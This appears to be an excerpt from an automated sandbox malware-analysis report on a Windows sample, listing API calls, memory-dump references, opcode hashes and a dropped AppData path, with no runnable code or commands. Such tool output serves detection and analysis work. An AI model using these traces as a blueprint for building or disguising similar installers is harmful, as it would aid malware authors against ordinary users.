                                                                                                          • Associated: 00000000.00000002.2417218395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417297454.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$AttributesCreate
                                                                                                          • String ID:
                                                                                                          • API String ID: 415043291-0
                                                                                                          • Opcode ID: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
                                                                                                          • Instruction ID: 5201df1ff3c0a0bd0294a98706b79309786c42e99614e685d4e3591f63f4d9e2
                                                                                                          • Opcode Fuzzy Hash: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
                                                                                                          • Instruction Fuzzy Hash: D5D09E31254601AFEF098F20DE16F2E7AA2EB84B04F11552CB7C2940E0DA7158199B15
                                                                                                          APIs
                                                                                                          • CreateDirectoryW.KERNELBASE(?,00000000,00403498,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004036EF,?,00000006,?,0000000A), ref: 004059A2
                                                                                                          • GetLastError.KERNEL32(?,00000006,?,0000000A), ref: 004059B0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2417203909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2417189556.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417218395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417297454.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateDirectoryErrorLast
                                                                                                          • String ID:
                                                                                                          • API String ID: 1375471231-0
                                                                                                          • Opcode ID: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
                                                                                                          • Instruction ID: 01a40f06620425e1c555583f7199589d3835b04f5715874dbca4219b9923c3a9
                                                                                                          • Opcode Fuzzy Hash: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
                                                                                                          • Instruction Fuzzy Hash: D6C04C71216502DAF7115F31DF09B177A50AB60751F11843AA146E11A4DA349455D92D
                                                                                                          APIs
                                                                                                          • EnumWindows.USER32(00000000), ref: 6CF12B6B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2464950937.000000006CF11000.00000020.00000001.01000000.00000004.sdmp, Offset: 6CF10000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2464871451.000000006CF10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2464976083.000000006CF14000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2465039264.000000006CF16000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6cf10000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: EnumWindows
                                                                                                          • String ID:
                                                                                                          • API String ID: 1129996299-0
                                                                                                          • Opcode ID: 8d30d6e53db500254995174986f8bfd29ee0642426ef8e25ca444d8c8d134058
                                                                                                          • Instruction ID: 71bd8884c0297eccd70337147ff86e9c908466cae90c15a74a4238fedbf8e29d
                                                                                                          • Opcode Fuzzy Hash: 8d30d6e53db500254995174986f8bfd29ee0642426ef8e25ca444d8c8d134058
                                                                                                          • Instruction Fuzzy Hash: CF41A072A18205DFDF64DFE4D98AB8937F4EB07328F22442AE505C6F00D73695889F91
                                                                                                          APIs
                                                                                                          • MoveFileW.KERNEL32(00000000,00000000), ref: 00401696
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2417203909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2417189556.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417218395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417297454.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileMove
                                                                                                          • String ID:
                                                                                                          • API String ID: 3562171763-0
                                                                                                          • Opcode ID: f4993909eaaf04b4d10f0c262de6f8e1be0fd70d19c578988f2b9bef0751c49c
                                                                                                          • Instruction ID: 73a88bd3a5ced7927151e6ebce11b30d6a6a5b8b2c4e1db0cab765602213b928
                                                                                                          • Opcode Fuzzy Hash: f4993909eaaf04b4d10f0c262de6f8e1be0fd70d19c578988f2b9bef0751c49c
                                                                                                          • Instruction Fuzzy Hash: CBF09031A0851197DF10BBA54F4DD5E22509B8236CB28073BB412B21E1DAFDC542A56E
                                                                                                          APIs
                                                                                                          • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 0040280D
                                                                                                            • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2417203909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2417189556.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417218395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417297454.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FilePointerwsprintf
                                                                                                          • String ID:
                                                                                                          • API String ID: 327478801-0
                                                                                                          • Opcode ID: 38b593970e7e5e8d656344d1d4c72dba1b6d10a1f376cfd8863b7a874be62c28
                                                                                                          • Instruction ID: 7217e66a6bf97858787bec6454aeb19e768c89e60d383eb7a66a1db5dd3d6cef
                                                                                                          • Opcode Fuzzy Hash: 38b593970e7e5e8d656344d1d4c72dba1b6d10a1f376cfd8863b7a874be62c28
                                                                                                          • Instruction Fuzzy Hash: 8BE06D71E00104ABD710DBA5AE098AEB7B8DB84308B60403BF601B10D0CA7959518E2E
                                                                                                          APIs
                                                                                                          • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 004062AC
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2417203909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2417189556.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417218395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417297454.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Create
                                                                                                          • String ID:
                                                                                                          • API String ID: 2289755597-0
                                                                                                          • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                          • Instruction ID: b492cd94208fe9a136032c47e7ca6226b28abdd7f17191690e67bc203102cabe
                                                                                                          • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                          • Instruction Fuzzy Hash: 94E0E672010209BEDF195F50DD0AD7B371DEB04304F11492EFA06D4051E6B5AD706634
                                                                                                          APIs
                                                                                                          • VirtualProtect.KERNELBASE(6CF1505C,?,?,6CF1504C), ref: 6CF129B1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2464950937.000000006CF11000.00000020.00000001.01000000.00000004.sdmp, Offset: 6CF10000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2464871451.000000006CF10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2464976083.000000006CF14000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2465039264.000000006CF16000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6cf10000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ProtectVirtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 544645111-0
                                                                                                          • Opcode ID: 6c5c9cbbbeff76ab4b1ffa5ac3385cba4d11520351e23d56e6e2e652fe8e08f3
                                                                                                          • Instruction ID: 8698bc387c273d60f33adf007a6ef3a4dfabdf5c29a38e23e8ebbe3f192b2db2
                                                                                                          • Opcode Fuzzy Hash: 6c5c9cbbbeff76ab4b1ffa5ac3385cba4d11520351e23d56e6e2e652fe8e08f3
                                                                                                          • Instruction Fuzzy Hash: 99F0AEB0F38282DECBD0CFA9C8467093FF0B71A304B568A2AE18AD6E40E3354544DF91
                                                                                                          APIs
                                                                                                          • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,00422708,?,?,004062E3,00422708,00000000,?,?,Call,?), ref: 00406279
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2417203909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2417189556.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417218395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417297454.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Open
                                                                                                          • String ID:
                                                                                                          • API String ID: 71445658-0
                                                                                                          • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                          • Instruction ID: 7481b87947078d819ae160a747d33610cb99cd3c2235475b1dc937127606ac98
                                                                                                          • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                          • Instruction Fuzzy Hash: C1D0123210420DBBDF11AE90DD01FAB372DAF14714F114826FE06A4091D775D530AB14
                                                                                                          APIs
                                                                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040315B,?), ref: 0040346B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2417203909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2417189556.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417218395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417297454.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FilePointer
                                                                                                          • String ID:
                                                                                                          • API String ID: 973152223-0
                                                                                                          • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                          • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                                                                          • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                          • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(?,?,00000001,004041BF), ref: 004043A2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2417203909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2417189556.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417218395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417297454.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend
                                                                                                          • String ID:
                                                                                                          • API String ID: 3850602802-0
                                                                                                          • Opcode ID: bd7e8dc2c5871e064c502d82a01b6574672f0de651032f207fd53ed2aa40cebc
                                                                                                          • Instruction ID: e4171d0a4592585bcf4a2ca6fb2eaed9aff33c093be5cb9cf1e9125a9c9e1139
                                                                                                          • Opcode Fuzzy Hash: bd7e8dc2c5871e064c502d82a01b6574672f0de651032f207fd53ed2aa40cebc
                                                                                                          • Instruction Fuzzy Hash: 0EB09235290600ABDE214B40DE49F457A62E7A4701F008178B240640B0CAB200A1DB19
                                                                                                          APIs
                                                                                                          • GetDlgItem.USER32(?,00000403), ref: 004055ED
                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 004055FC
                                                                                                          • GetClientRect.USER32(?,?), ref: 00405639
                                                                                                          • GetSystemMetrics.USER32(00000002), ref: 00405640
                                                                                                          • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405661
                                                                                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405672
                                                                                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405685
                                                                                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405693
                                                                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 004056A6
                                                                                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056C8
                                                                                                          • ShowWindow.USER32(?,?), ref: 004056DC
                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004056FD
                                                                                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040570D
                                                                                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405726
                                                                                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405732
                                                                                                          • GetDlgItem.USER32(?,000003F8), ref: 0040560B
                                                                                                            • Part of subcall function 00404394: SendMessageW.USER32(?,?,00000001,004041BF), ref: 004043A2
                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 0040574F
                                                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_00005523,00000000), ref: 0040575D
                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00405764
                                                                                                          • ShowWindow.USER32(00000000), ref: 00405788
                                                                                                          • ShowWindow.USER32(?,?), ref: 0040578D
                                                                                                          • ShowWindow.USER32(?), ref: 004057D7
                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040580B
                                                                                                          • CreatePopupMenu.USER32 ref: 0040581C
                                                                                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405830
                                                                                                          • GetWindowRect.USER32(?,?), ref: 00405850
                                                                                                          • TrackPopupMenu.USER32(00000000,?,?,?,00000000,?,00000000), ref: 00405869
                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A1
                                                                                                          • OpenClipboard.USER32(00000000), ref: 004058B1
                                                                                                          • EmptyClipboard.USER32 ref: 004058B7
                                                                                                          • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058C3
                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 004058CD
                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058E1
                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00405901
                                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 0040590C
                                                                                                          • CloseClipboard.USER32 ref: 00405912
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2417203909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2417189556.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417218395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417297454.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                          • String ID: (7B${
                                                                                                          • API String ID: 590372296-525222780
                                                                                                          • Opcode ID: 1d1f977673fe441afad02026140f53aaec566053b515a361d3c8f7f727d52ca3
                                                                                                          • Instruction ID: ef9837d71be30d97cad1ad5ee6bf48d4101bac37d77d0ad6e239d9f51a57dc01
                                                                                                          • Opcode Fuzzy Hash: 1d1f977673fe441afad02026140f53aaec566053b515a361d3c8f7f727d52ca3
                                                                                                          • Instruction Fuzzy Hash: C4B16A70900608FFDB11AFA0DD85AAE7B79FB48355F00403AFA45B61A0CB754E52DF68
                                                                                                          APIs
                                                                                                          • GetDlgItem.USER32(?,000003FB), ref: 0040489F
                                                                                                          • SetWindowTextW.USER32(00000000,?), ref: 004048C9
                                                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 0040497A
                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 00404985
                                                                                                          • lstrcmpiW.KERNEL32(Call,00423728,00000000,?,?), ref: 004049B7
                                                                                                          • lstrcatW.KERNEL32(?,Call), ref: 004049C3
                                                                                                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049D5
                                                                                                            • Part of subcall function 00405A32: GetDlgItemTextW.USER32(?,?,00000400,00404A0C), ref: 00405A45
                                                                                                            • Part of subcall function 0040667C: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,74DF3420,004036EF,?,00000006,?,0000000A), ref: 004066DF
                                                                                                            • Part of subcall function 0040667C: CharNextW.USER32(?,?,?,00000000,?,00000006,?,0000000A), ref: 004066EE
                                                                                                            • Part of subcall function 0040667C: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,74DF3420,004036EF,?,00000006,?,0000000A), ref: 004066F3
                                                                                                            • Part of subcall function 0040667C: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,74DF3420,004036EF,?,00000006,?,0000000A), ref: 00406706
                                                                                                          • GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,00000001,004216F8,?,?,000003FB,?), ref: 00404A98
                                                                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404AB3
                                                                                                            • Part of subcall function 00404C0C: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                                            • Part of subcall function 00404C0C: wsprintfW.USER32 ref: 00404CB6
                                                                                                            • Part of subcall function 00404C0C: SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2417203909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2417189556.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417218395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417297454.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                          • String ID: (7B$A$Call
                                                                                                          • API String ID: 2624150263-413618503
                                                                                                          • Opcode ID: 60ed21fe2f328070877fcf4fb1291f079d9e461e65f212612ce38389da6d49e8
                                                                                                          • Instruction ID: 217fbe9c53fcac7a38d38ba6b36a95d3c52d9e466bb1b0d29fe77156d884dce9
                                                                                                          • Opcode Fuzzy Hash: 60ed21fe2f328070877fcf4fb1291f079d9e461e65f212612ce38389da6d49e8
                                                                                                          • Instruction Fuzzy Hash: 01A161F1A00205ABDB11EFA5C985AAF77B8EF84315F10803BF611B62D1D77C9A418B6D
                                                                                                          APIs
                                                                                                          • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,?), ref: 00402183
                                                                                                          Strings
                                                                                                          • C:\Users\user\AppData\Local\Iw\Bombestoppets, xrefs: 004021C3
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2417203909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2417189556.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417218395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417297454.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_c7WJL1gt32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateInstance
                                                                                                          • String ID: C:\Users\user\AppData\Local\Iw\Bombestoppets
                                                                                                          • API String ID: 542301482-542753526
                                                                                                          • Opcode ID: 4630f11a642d4e3ef4f98d2454dc0e8d663bfbe8c95ddff176ede1b1d5b4d77b
                                                                                                          • Instruction ID: a370b0fa9b2e606d6813e98b4c017b265e4ea8c47d708310f479c561ceb58c7b
                                                                                                          • Opcode Fuzzy Hash: 4630f11a642d4e3ef4f98d2454dc0e8d663bfbe8c95ddff176ede1b1d5b4d77b
                                                                                                          • Instruction Fuzzy Hash: 80414A71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E1DBB99981CB54
                                                                                                          APIs
                                                                                                          • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402877
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2417203909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2417189556.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417218395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417231352.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2417297454.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
